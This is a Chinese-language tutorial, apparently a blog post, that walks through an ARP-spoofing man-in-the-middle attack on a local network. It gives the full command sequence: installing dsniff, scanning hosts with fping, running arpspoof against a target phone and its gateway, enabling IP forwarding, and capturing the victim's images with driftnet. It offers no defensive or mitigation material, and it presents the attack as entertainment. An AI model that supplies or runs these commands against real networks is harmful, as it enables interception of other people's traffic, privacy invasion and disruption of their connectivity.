目录
ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
桥接模式:相当于在物理主机与虚拟机网卡之间架设了一座桥梁,从而可以通过物理主机的网卡访问外网。
NAT 模式:让 VM 虚拟机的网络服务发挥路由器的作用,使得通过虚拟机软件模拟的主机可以通过物理主机访问外网,在真机中 NAT 虚拟机网卡对应的物理网卡是VMnet8
仅主机模式:仅让虚拟机内的主机与物理主机通信,不能访问外网,在真机中仅主机模式模拟网卡对应的物理网卡是 VMnet1
(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:
apt-get install dsniff
ifconfig
fping -g 本机IP地址/24
PS:例如我的IP是192.168.1.26,命令就是
fping -g 192.168.1.26/24
找到目标IP(Windows如果启动防火墙找不到)。
(sudo su 启动root权限)
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
PS:网卡名称的查看上文已经提过,我以我的网卡为例,名称是
eth0
,攻击目标就是我的手机,IP是192.168.1.25
,手机的网关就是192.168.1.1(就是IP的最后一位改为1),于是我的攻击命令就是:arpspoof -i eth0 -t 192.168.1.25 192.168.1.1
最后手机虽然可以上网,但网速很慢,这就说明我们的ARP欺骗成功了。
如果你想停止攻击,就按下
Ctrl+Z
,攻击就停止了。
1. vim /etc/sysctl.conf 配置文件,将net.ipv4.ip_forward
配置项取消掉“#
”注释符号,并将其值由 0 改为 1 即可开启端口转发.
2.在kali的root模式下输入
- echo 1 >> /proc/sys/net/ipv4/ip_forward
- cat /proc/sys/net/ipv4/ip_forward
- 1
driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片,其使用语法: driftnet [options] [filter code]
。
- 主要参数:
- -b 捕获到新的图片时发声
- -d 指定保存图片的路径
- -x 指定保存图片的前缀名
- -i 选择监听接口
- -f 读取一个指定pcap数据包中的图片
- -a 后台模式:
- -m 指定保存图片数的数目
PS:接着在 Kali 终端重新执行 arpspoof 命令(注意网关IP和主机IP顺序此时需要对换一下
arpspoof -i eth0 -t 192.168.1.1(网关IP) 192.168.1.25(目标IP)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.25
打开另外一个终端并执行 driftnet -i eth0
命令,即可获取到目标主机的图片。
注:像一些https://开头的网站基本上获取不了,即使获取到了也比较慢,没有参考价值,仅供娱乐)